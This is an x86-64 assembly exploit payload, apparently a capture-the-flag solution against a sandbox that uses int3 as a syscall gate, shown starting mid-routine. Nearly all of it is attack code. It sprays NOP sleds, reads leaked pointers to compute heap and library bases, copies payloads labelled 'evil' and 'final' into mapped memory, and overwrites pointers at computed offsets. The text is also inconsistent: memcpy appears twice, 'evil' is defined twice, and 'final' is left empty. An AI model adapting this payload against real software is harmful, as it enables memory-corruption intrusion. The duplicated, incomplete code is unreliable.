    inc     rdi
    dec     rdx 
    jnz     memcpy_loop
memcpy_done:
    ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

shellcode2:

mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer] 
int3

mov rbx, rax     
mov rax, 2
int3
            
mov rdi, 0x42420000
mov edx, 1
mov ecx, 0x10                        
l:
    mov rax, 0x9090909090909090
    mov qword ptr [rdi+8*rdx], rax
    inc edx
    loop l                    
        
lea rsi, [rip+evil]
mov edx, 6
mov rsp, 0x13380f00            
call memcpy

mov eax,10
mov rbx, 0xdead000
mov rcx, 0x10000
mov rdx, leaked_address          
int3

mov r10, 0xdead000
mov r8, qword ptr [r10+0x10]
lea r9, [r8-0x1a0]

mov rbx, r9
mov eax,2
int3

mov r11, qword ptr [r10+0x60]
sub r11, 0x41f0
mov rbx, r11
mov eax,2
int3
//heap


mov eax,10
mov rbx,0xdeadbeef000
mov rcx, 0xf000
mov rdx, r9
int3

mov rdi, 0xdeadbeef000
lea rsi, [rip+final]
mov rdx, 0x80
call qmemcpy

push r11
mov eax,10
mov rbx,0xdeaddead000
mov rcx, 0xb0000
mov rdx, r11
int3
pop r11

mov r11,0xdeaddead000
mov r12, qword ptr [r11+0x5b00]
sub r12,0x1630

mov rbx, r12
mov eax,2
int3


mov eax,10
mov rbx, 0x12345000
mov rcx, 0xf000
mov rdx, r12
int3


mov rbx, r9
mov eax,2
int3

mov r12, 0x12345000
mov qword ptr [r12+0xd38], r9
mov qword ptr [r11+0x3fc90], -1
jmp $

memprot_x86_64:
    .asciz "memprot_x86_64"
password_buffer:
    .asciz "sup3r_s3cure_sj\\0"
password:
    .asciz "password"

memcpy:
    test    rdx, rdx         
    jz      memcpy_done
memcpy_loop:
    mov     al, [rsi]  
    mov     [rdi], al
    inc     rsi
    inc     rdi
    dec     rdx 
    jnz     memcpy_loop
memcpy_done:
    ret

// qmemcpy: copy rdx bytes from [rsi] to [rdi], eight bytes at a time.
//   in:  rdi = destination, rsi = source, rdx = byte count
//   out: rdi and rsi point just past the copied data, rdx = 0, rax is clobbered
// The routine branches only to its own labels. Whole qwords are copied while at
// least 8 bytes remain, and any 1..7 leftover bytes are copied one at a time,
// so a count that is not a multiple of 8 cannot underflow rdx.
qmemcpy:
    cmp     rdx, 8
    jb      qmemcpy_tail
qmemcpy_loop:
    mov     rax, [rsi]
    mov     [rdi], rax
    add     rsi, 8
    add     rdi, 8
    sub     rdx, 8
    cmp     rdx, 8
    jae     qmemcpy_loop
qmemcpy_tail:
    test    rdx, rdx
    jz      qmemcpy_done
qmemcpy_tail_loop:
    mov     al, [rsi]
    mov     [rdi], al
    inc     rsi
    inc     rdi
    dec     rdx
    jnz     qmemcpy_tail_loop
qmemcpy_done:
    ret
        
evil:
mov eax, 5
int3 

final: